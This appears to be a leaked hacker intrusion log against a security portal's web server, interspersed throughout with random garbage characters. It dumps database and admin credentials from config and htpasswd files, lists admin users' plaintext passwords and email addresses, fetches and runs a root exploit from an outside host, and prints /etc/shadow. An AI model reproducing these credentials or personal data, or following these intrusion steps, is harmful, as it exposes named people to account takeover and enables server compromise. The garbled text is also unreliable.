! {: t/ I8 } _; Y4 {total 200
7 ~+ ^1 S: f$ W/ e' F, Ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .- k# y! y S2 ^
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
2 Y9 D+ z" v+ L* [; d5 ^; ?drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
9 e3 \6 d. a b& z0 s- Rdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql3 ~1 T& r8 p6 T1 Y$ p
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com8 N5 T: L4 \' m6 f) j2 g+ N8 b
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend6 h4 F9 ?- W7 W. k
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner+ e1 j- j5 U" R* q$ [6 @1 v
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
: g" f- p f ?+ z/ G# Q5 mdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config. i* P; j9 g+ q3 `
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron# D+ c# q) z% q, p8 e# Q; f
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd: e+ K. Y( s/ k9 ]) a+ ~
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
9 `4 A4 M' \' P-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
2 x# x: h4 O L# p" gdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
' ^( j# D0 Y9 m/ a/ H/ l o' d. }drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
' A6 U. r; D/ }# @; ]4 g-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
8 [7 X% @" f2 R7 a0 ^8 j-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess# I7 N4 m% J; o5 W: V( N) I2 l
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php( O! W, R3 t) Y8 A- y
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
7 y1 X% F" n2 |) Q( U7 A-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php- `8 m1 I0 `6 O
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php( j5 M; t, U3 g1 G9 x% a
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf9 }5 B/ ]) f) _( y
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc3 M! e( t4 {1 ~) u$ D
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang" E! b% S6 e/ X# \0 D2 z0 Z
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib7 G7 T- E7 j/ g j3 x
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log" b+ d: ]3 s! y* I" |6 W. F! M7 l
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
- C$ ?0 i% S* D+ b0 L4 wdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
9 B: i9 W6 m+ ndrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
& p' T* Z8 w! {8 |! h9 P0 i-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf' y+ f& l* F+ u- v
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
1 o" Q; R+ Z Q/ }6 D, B3 n-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
9 Q# h7 e$ v+ K: {: y" ]" Ldrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss" n6 |$ r/ N& C3 k1 E+ g' ^* X
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
0 w* K& K( @3 B& H" H5 Wdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com: z, f+ Q, L" s T; b! V* ]
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
( I; g: h, \. adrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
/ I$ z% {3 w$ U: W- Cdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl: N2 F1 O) j% H7 z
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2# l- j5 L j4 B& w* f+ Z
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
! `( L+ r; k! Y4 z9 X9 r Q% L-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
) e' o- j9 R# G. ?3 B3 mdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki% O# g; Q9 ~* K" {* g$ n
% P" S) M( R" `" J# r6 H3 Y5 [
sh-3.2$ head -20 index.php5 Q! x K% v. Q
<?PHP
& G$ }, x6 {- j* O/**
* Q4 `2 z& ?" k5 W7 l1 L, h* Mainfile (external) for astalavistaNET v2.0
8 ~, a) b# h; n- I* h$ L" R8 B* a*. o, ^: G* K2 |1 i- A% b5 V. }0 z
* @copyright Astalavista IT Engineering GmbH
0 p9 F5 O+ v: I* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
7 g/ k# y, i( v8 @* @version 1.0( Q% K( `: Y' B* T
*/, `, @- @& C! y. ]5 y
4 Q8 M2 F. H! }! [" Z" J if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
! t7 ?& |$ |' ~ C% n* h: ?3 d $dontStartSession = false;' A( h/ a% J5 W( z
} else {
* }0 o7 J) X" O& f& r $dontStartSession = true;
" @. M+ d! ^' r- [4 U! c+ l/ ? }
- M; _/ ^6 Z: _1 { y- V require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
" c0 H% Q' @; Q require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);( Q( a% V6 |1 y2 S0 f: J6 ~
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);" d( @& l; ?5 x! w( q& g: c# m
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
& R% G3 m" r1 w$ h/ y" ]6 z n( i' Q
sh-3.2$ cd config& F+ t+ N: G% S, U
sh-3.2$ ls -la3 S; @# n- I7 T' K
total 325 o# p( ]4 o. q9 p
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .2 ?: D% X6 i+ j/ |# {+ i
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 N) P5 y$ Q) Z j& f& H-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php+ a [( {. j9 v; ?# x0 I
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php- E" ~* N! X' j5 ~7 Z7 j6 p2 p% L" F: d
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php% d8 h6 V4 O1 |) j6 S% S: k7 B1 `
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php) i0 c3 c K9 W9 ^ W
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
8 L9 R& z# o( Y7 G% |5 ]! U6 F/ `& F$ {3 h, F& L
sh-3.2$ cat com.conf.php
0 d3 @* `0 r6 i( P- I[snip]) w3 w5 C K# n
//member-database& r* |: m! g' T) V2 W- l# ] {
$_CONFIG['db_mem_server'] = ‘localhost’;
6 {; q2 P4 C5 ]5 Q7 @3 ?$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;- p2 D, q0 j* N+ E
$_CONFIG['db_mem_user'] = ‘astanet_db’;# t; J' l1 q4 M% ]1 Y2 B
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;& a, U- Y0 v9 C" V F
$_CONFIG['db_mem_debug'] = false; //true or false
9 r% Z# n2 q$ f) I% p& t6 e//ads-database9 T6 e8 m! k r9 |
$_CONFIG['db_ads_server'] = ‘localhost’;& _+ |* V5 E6 B! _
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
4 a( f$ M; O5 Y( m. f* d6 K$_CONFIG['db_ads_user'] = ‘astanet_db’;
) W* z8 r8 f% o9 U0 I8 a$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’; O1 L- Y4 [/ U/ U/ @2 @& Q J
$_CONFIG['db_ads_debug'] = false; //true or false
& e5 S/ D* |( M9 x! @. V0 q//rainbow-database
* b8 M6 a0 r- I- B7 t5 f6 g5 F. J$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;! R2 _4 x( j6 O# c& R: V) M: K
$_CONFIG['db_rainbow_database'] = ‘rainbow’;# R8 W& @% |* K$ N8 @
$_CONFIG['db_rainbow_user'] = ‘dinu’;
3 U n( t6 e6 e: ^6 `$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
* x8 K3 B" h5 _$_CONFIG['db_rainbow_debug'] = false; //true or false! R( z. L+ f, U- o2 g% m: F: B
//mailing lists database
- E$ g. D1 {6 \$ |- N( Z$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
& S% B0 |$ }" U, a( E2 x$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;3 I( Y6 M8 g5 G7 |
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;+ n O" v- `/ \6 q- A
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
- t8 G& N" U" P$ t0 S& f: u$_CONFIG['db_mailing_lists_debug'] = false; //true or false
5 G* O; c' X& t _; d; S X//paypal
1 x) B/ J. M# N" G) `% u5 F$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
7 r7 d( }4 s3 D$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
! c' L- W+ Q1 y9 @) a1 G* q$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
/ s6 b! _2 j" @+ g* n) D$_CONFIG['sub_pp_noship'] = ‘1′;$ J& n% M1 j7 y7 u
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
; R7 {) l8 G5 F. A; ]. S[snip]0 t( J$ E) \3 b( N3 I
, M; L7 o5 L2 |' _ e* l8 X; i; Z. R
sh-3.2$ cd ..$ V: F, P5 E: ~' ~
sh-3.2$ cd member
+ m- p4 F7 v4 \! Fsh-3.2$ ls -la
. L& b7 Q% g+ l$ t; g u9 Jtotal 204 i/ T/ `" K8 x$ r5 d
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
4 h( [" _" h$ D% I1 D7 U) Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 y- u" [, l3 S/ o6 U7 T% X R8 g8 D$ b-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess2 f0 K" `" p! e9 r" I
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
# i$ ?# y- C: ]0 O* h) Vsh-3.2$ cat .htaccess
7 j0 ]$ S, Z7 \4 T0 n5 S+ rSecFilterEngine off# ?! L& g5 o% Z% d Z6 `
4 H% o* C4 q/ q' D I; t5 ash-3.2$ cd ..' V- Y1 q- F# z) c
sh-3.2$ cd cron+ P& @( i w8 W' w* _1 j& j
sh-3.2$ ls -la; \. {- l! ~2 z+ h
total 168
/ U" o+ {2 J. N) k! H& t: O+ h$ @drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .6 W1 J% d5 H/ x( x6 q
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
- \# Q5 p* G( _$ [ x-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php! E* h9 ~9 \2 s6 e4 ^1 f: {7 f
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php6 T* d# l4 H# v0 R( ?
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
6 o. H; K" W) R$ t% h-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php5 i6 W, _0 ]# n5 l2 ~& ^
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
& L) y( n/ m3 `( V: v$ h9 m& _-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php5 F% O; i2 f' m- c* r
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
3 v( f7 w5 \: E6 x+ |# G; y/ H0 i-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
2 s* p! c7 h: r1 a" [/ ^' l( [' _-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh: ^0 e9 a D# s# M
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
& ]* k2 J9 f) |9 D v4 l4 d+ p( \- N-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
E2 Q6 T' Z- Z" b2 m1 Y-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php( m9 j; T2 d6 l% S8 C% @+ W
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh/ \; ]' `. H% h/ q8 _0 {$ f
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
8 ~& _3 M9 i% h-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php) |1 E$ K4 Q, E( p( U
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
( r: Q- r0 _) ?' a+ i# H-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
: ?4 K9 z% G* v3 {0 d) ^' q( _-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php7 P! P' k% l, r; [% s3 Q8 ^5 X
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email5 ^( e* @& q; v# c+ k
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
$ T* u4 N' l/ u0 W2 @+ L( k' l-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
+ W9 M6 O* g4 h( ^) {# q7 b: \ V6 G7 A" ` [
sh-3.2$ cd ..) s5 G) ?- ]' m9 [' ~
sh-3.2$ cd _007
0 V* r4 p3 m9 c4 D( e0 [sh-3.2$ ls -la
& K0 d8 {2 ~3 A" D. Ptotal 24$ Z& i' p8 ?& g3 O
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .5 v! y* u* E# Z$ h0 X( T% d0 W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 ?3 L# ^9 x; b5 [
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
7 o9 |8 ^/ L9 j2 x+ v$ A h-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
# T" W5 R6 G: Y; C+ J- k0 n! ?; n-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
) T, {9 M( t% D% m0 a, ?4 Rdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
; P, b; x" `* i
% H9 X1 m @/ r& @) [ xsh-3.2$ cat .htaccess
- w3 R5 G9 {* G# [+ i7 g$ wauthType Basic
* i' {& [; C& q; H1 UauthName Admin1 T; f6 `- U( v
authUserFile /home/astanet/auth/.htadm_pwd
8 |5 x: u- N$ c( k2 Wrequire valid-user" M* V; `( m2 G9 k8 B
/ y+ R6 ]2 o% v! R! t6 m/ ash-3.2$ cat /home/astanet/auth/.htadm_pwd- R; i+ G }; b3 j
admin2net:CR0bl65MwhfT
# @1 F6 d0 ^- z L
3 r4 j+ g3 q2 y2 t+ J" o$ fsh-3.2$ mysql -u astanet_db -p
! Y1 u- B* R5 M/ i2 S; @Enter password:2 k0 ?, V' g* D$ R- ~/ H" M# _
Welcome to the MySQL monitor. Commands end with ; or \g.% l( O2 J$ u* Y1 L, d
Your MySQL connection id is 275153
9 \+ x. r* q: B3 X3 d* A- L* L/ sServer version: 5.0.45-community-log MySQL Community Edition (GPL)! v0 U3 ^' \# z! Q( ~
3 q2 c; ~+ D( ]7 c2 c; N8 CType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 T. y, A( o3 B7 b) i* Z6 m3 Y1 R9 L4 p" G6 T; }) j+ x( d: m% e
mysql> show databases;0 V3 G& ?# K- d5 t3 u+ T+ ]
+———————–+
% B1 ]: w, U/ h" P0 h* Q9 Z| Database |4 ?2 f+ c. h6 K4 n4 r
+———————–+6 r8 E B8 U3 H$ w' H
| information_schema |
' E) b# v7 t) g; ^) l' s. Z| astanet_ads |' C- X0 {" e% n* K; v8 ?7 u
| astanet_mailing_lists |
0 d! o; ^3 {* U! h| astanet_mediawiki |$ X6 A) n6 C% m4 Z$ S
| astanet_membersystem |, X5 B' T1 x" ]7 D; t+ j" W6 P! o
| test |, n$ v2 p& l. j4 j0 q
+———————–+
& d; E$ [5 F9 N: d$ S6 rows in set (0.00 sec)
6 p( O8 [0 E* f$ \7 n
4 T( W& K% a: i5 Omysql> use astanet_membersystem" R+ r5 e( U! K9 o- M z
Database changed6 `7 z" e/ a8 ~# r; ]
mysql> show tables;. u& @. M2 p4 {0 d8 y. i% `8 s
+———————————–++ Z3 d4 Z2 |; _$ z. Z; h7 n
| Tables_in_astanet_membersystem |
6 E% X- }+ D! U4 E+———————————–+
% |% E+ [# u+ K$ O2 S! r| blacklist_categories |5 l3 y5 ]% }+ U6 V1 W, ~4 Z' f
| blacklist_content |) c) C) b, y8 r" p; D
| blacklist_levels |9 t' [5 e9 p8 a: a: A6 g* i
| blacklist_mcset |
1 Z3 c+ k3 G. `2 d| dir_categories |
! a; S, |1 S- N2 [% k+ H| dir_comments |
" A' b7 x. Y! F* K' c& B9 S| dir_links |
6 @ V6 m6 l- X' K# E. e) B| dir_temp |4 l: ~& ~( F, k+ T* e9 m
| dir_votes |; U) N7 ^# a6 ~: N
| documents |
S2 y0 l: a/ P/ F; m| documents_categories |4 p! U* h$ _9 e& k
| email_content |6 @* x- x. M7 m( U# @. K
| email_settings |7 p" r+ Y0 a0 u3 \: R0 x" j* `
| exploits |
: n7 T' ^& a) h" O| exploits_categories |/ g% Y5 L' D& Q S" ~
| exploittree_categories |
" \0 Y; g# t& o2 b X) X' ?| exploittree_exploits |% \, G" m) l) o' J5 D
| home_values |
6 W: t) y8 S/ R| iso_countries |6 }& w2 W( v; w' t* F
| links_categories |
# A) k5 R* U4 d| links_records |' e, Z4 a; L4 Y4 ~" L; h) x- l/ r
| links_unauth |
4 P q, [' G4 o9 }5 T! K| links_votes |
6 ^! {6 Y, R& W3 s! z& E| log |) [/ b) A! B: _# Z" W: _6 l
| news_categories |
& j, q) E3 z5 { R| news_comments |9 ^5 g# @" Z+ R1 ]7 J
| news_emoticons |% K2 c6 j! z1 m+ \+ k; |) \/ q
| news_latest |
- }4 |* H2 G9 S( p/ _9 b| news_messages |6 J" T% L: o8 S" l1 j
| news_statistics |
/ u7 k% N4 A+ A6 G t& @3 Z| news_votes |* S; T1 _# a5 b4 K9 @ F a7 W' J3 N
| prices_content |" Y _4 c% P2 ^+ V' O
| prices_offers |
2 Q% ~$ L5 w, R6 F& F- s| rss_settings |. a( }3 Z6 D2 W( E6 a* S
| sessions |
, R2 x5 C( }5 N8 @, K7 y" D4 }| stats_signups |
0 K" O. w x: |# O) T& n+ n| u2u2 |
& U1 O; t. M! c* P! r| u2u_contact |5 X# {2 X- k0 }; D$ |6 K
| u2u_settings |
: n# H# g! O( ]- Q| user_keywords_selected_categories |
# d3 z( U- e# I$ @* j| users |# D _/ g/ Z% |0 ~
| users_ipn_test |
7 C2 B9 i/ \( U7 r) o" X% H| users_keyword_values |$ {$ k% U& K5 d" L3 U% R- v2 \
| users_profile |
+ L! Y U& O/ L: `. e% `1 X4 s$ M' ~| users_temp |
, x- m6 J' m7 x* M' E| users_upgrade |
0 Y* j$ u5 C J- G0 H5 h+———————————–+) l6 n% M) ?3 X$ l' N3 s) f/ ^
46 rows in set (0.00 sec)
1 d6 V* \ y; N, n, X& b) M) Q, ?. K3 D) t+ B0 ^& ?
mysql> describe users;' Z6 }: z# s$ i* R" l
+————————–+————————————–+——+—–+———————+—————-+" k5 Z) i) |8 }4 I! I8 ?
| Field | Type | Null | Key | Default | Extra |
9 `; V, L( x1 L$ C: @+————————–+————————————–+——+—–+———————+—————-+
}8 y! I$ x/ d2 n| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |" M/ ]$ p( Y* c1 s& |
| user | varchar(50) | NO | | | |
$ B' B1 s* m2 p( B& R6 W) D) P. \" z| nickname | varchar(30) | NO | MUL | anonymous | |
5 {3 Z+ s% E; M8 w v( ^3 v$ x| password | varchar(30) | NO | | | |5 O$ F( Z( J/ _3 Z5 X
| userlevel | tinyint(3) | YES | MUL | NULL | |: `' d, }: n! _" E2 ^1 \. Y
| exp | int(8) unsigned | NO | | 0 | |. h% C$ `' s$ @- e2 r8 P. I) L
| email | varchar(50) | NO | | | |% G7 Z" u, m1 c
| ip | varchar(15) | NO | | 0 | |$ z4 u- {# F/ L3 c
| proxy | set(’0′,’1′) | NO | | 0 | |2 L9 x: O6 F* O) c, p9 C
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
, Q0 M, p2 {3 Y, A| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |5 \: u: X' q$ m, N! W% F
| anz_in | tinyint(1) | NO | | -1 | |7 a0 S7 T% t4 R$ z& H& I
| status | tinyint(1) unsigned | NO | | 0 | |8 f5 N5 I2 O% g, T/ Z1 ~
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
6 ?; X4 e- C! c9 \| freemember | set(’0′,’1′) | NO | | 0 | |
, r# N* v. z+ g7 T( _| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
2 r f1 u$ d9 Q| lang | tinytext | NO | | | |$ u- |0 U9 s9 j, D0 Q
| adid | smallint(6) | NO | | 0 | |
) Z) D% E0 F2 X; d% {| pp_txn_id | varchar(255) | YES | | NULL | |
3 u1 u5 G3 z+ z7 y8 m6 l| cnb_transaction_id | varchar(255) | YES | | NULL | |
" q4 x& q( c9 @: P( S7 p3 ]| cnb_order_id | varchar(255) | YES | | NULL | |7 H r# I- M# k+ h
| cnb_user_id | int(11) | YES | | 0 | |
! y9 q! `: @3 t8 R+————————–+————————————–+——+—–+———————+—————-+
3 x @& f/ D' p* w22 rows in set (0.01 sec)4 m* g+ A. y% E/ T' X
& h/ K# F! J5 g4 a; f+ }
mysql> select count(*) as skids from users;
4 T1 w2 H! X: p) N" s5 z& ^- u+——-+
* U1 j5 o& S5 T; K% ?| skids |
' N/ G4 ?: u1 M' y) [2 O- @: e& ^+——-+
2 b+ Y# s3 a8 R7 {| 25199 |' c$ b/ Z7 n! O r3 R5 X
+——-+0 o4 s8 A3 L( B. J
1 row in set (0.00 sec)
2 U& U9 k2 I* z& T4 x: D4 E0 I- k9 i
mysql> select user,nickname,password,email from users where userlevel = 1;
+ Q7 Z( J# `* }+————————–+———————-+——————+———————————–+; w) {9 U6 e* C$ B0 Y
| user | nickname | password | email |
1 W3 U; m! y+ r+————————–+———————-+——————+———————————–+
( }$ f7 e3 V0 n5 n| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
( r3 s% v6 P0 R* z" I( p6 b| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
) ?" `! m* }) Z| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
5 f' A( C9 x: ]$ R# g| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |: U1 @/ B9 H0 d# _3 X
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |: O, b/ r i, P' q* }" j" D+ X
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
4 s! ?$ ^* K& Q8 K; n| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
7 a, d6 r7 I4 k$ R4 _, @. p' P| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
2 w7 T/ ? e2 p" T% O. l+ g" X5 g d/ a B| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |+ G/ T: a/ h. f$ n4 H
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |% V% J6 _* ^. O3 j( T
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |3 a. u) C @5 Q9 k
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |1 _! v2 F7 t9 z1 t4 O
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |- W7 v& h+ k) a* j, {; i+ L$ G8 k8 L
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |2 m2 ~! u# b5 v) V& h0 V2 y5 O
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
* w3 [# @ Q( {, S* X" n| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |: P) Q c. w# ~% o6 H& l) V
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |" Y: o9 b% v& q. S) v# E
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
! w9 b, o& g7 Q. ~| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
8 |* x) C9 X7 l: s% W& j| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
$ b5 ^! w* B2 K s- I+ ~: {- {8 `| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
# C1 X; W; j [; X$ x9 v| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
$ r3 v/ M V) l- ?| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
+ C( z8 I6 S1 V8 a| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |2 C" c4 _& I6 e" b4 o3 k7 c" p
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |% t* a! H! L* F. |) t
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |9 J- a( K* U. Y' ^
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
( c3 c( T+ |, v* @+————————–+———————-+——————+———————————–+
+ w% X7 Q1 r8 U+ Y. P/ L$ {27 rows in set (0.00 sec)9 ?. B8 P8 e- ~
7 U* k" v* j# }( o, W, |mysql> exit;
* z2 Q5 p; {+ b8 n9 f7 B1 cBye5 x, `! O2 Z( z1 }
# \. l) Z- ^7 e" u1 L0 x$ W
[~] plaintext passwords? yes,' r! m9 Y* o/ @: l( D
Those so called “security professionals” who charge you $6.66 / month to% Y% \+ K( Q% E1 {7 m# W# Z
register at their hack-proof portal, save your passwords in plaintext…* l' t) |; ]6 t) {, H( _2 m1 s
brilliant!
* n; K3 }8 a% w [+ i
6 S0 a N; E% f. s8 n! i% B[~] This been fun but we want more.
' I0 w1 N; y- I) N S5 B. {
: W5 {# H- o, @' e! p: v; [sh-3.2$ uname -a
+ S( t r& `" F+ M' K! h8 _Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux1 q3 ~+ x! u8 \
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]2 P: e, ?5 j# \ G
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]0 R6 i. L4 E& Z) V) @/ ]
Resolving anti.sec.labs… 13.33.33.37
. c- `- Z1 a; `% R& V/ o3 t! K8 KConnecting to anti.sec.labs|13.33.33.37|:80… connected.
8 ^$ x8 q7 u6 ~8 JHTTP request sent, awaiting response… 200 OK7 T% N! n7 K2 j1 {# X
Length: 18200 (18K) [text/plain]3 e4 \% o, s+ p0 y# F6 A3 o. P. x
Saving to: `g0troot’$ [" B$ w/ K# `( {3 G9 N0 Y
4 l- x8 u! M6 G100%[=========================================================================================================================================>] 18,200 58.6K/s in V2 \ C3 b- K5 t4 b9 n7 |
0.3s$ B0 m& S3 q, c) @
0 A! R& q! b0 S% u3 V. X1 ~
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
( z% S3 C, h- D; k
8 a& N3 `, ~- [( \8 v5 `6 Rsh-3.2$ ./g0troot -i x86_64
$ z5 R2 c6 l- a7 X7 g9 n& T& ^- o' c[+] g0troot - anti.sec.labs9 C0 S2 _5 H6 ~6 W) ]/ ~
[+] Target: 2.6.18-128.1.10.el5
. L+ h8 F# m- S5 V& o- W& {[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
& ]% P! }' f. k* l: R0 R. _- ^0 ~8 {- |" ?. W, Q0 G1 ^
[+] r00tr00t
8 h/ b8 S5 s( ^[~] Executing shell…
/ v: U( N6 c% J0 W0 y- _7 q: t8 w3 E- z7 y: U: r
sh-3.2# id
. g, |' p" G! a" S2 p7 k# Buid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel); V5 y: h( Y4 [4 f$ i1 F6 m0 Q- U
" ] }7 R, j4 l# r( O" B
sh-3.2# cat /etc/shadow2 j: X' e; _9 t
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::' s% P! Q7 f( B# d+ K
[snip]
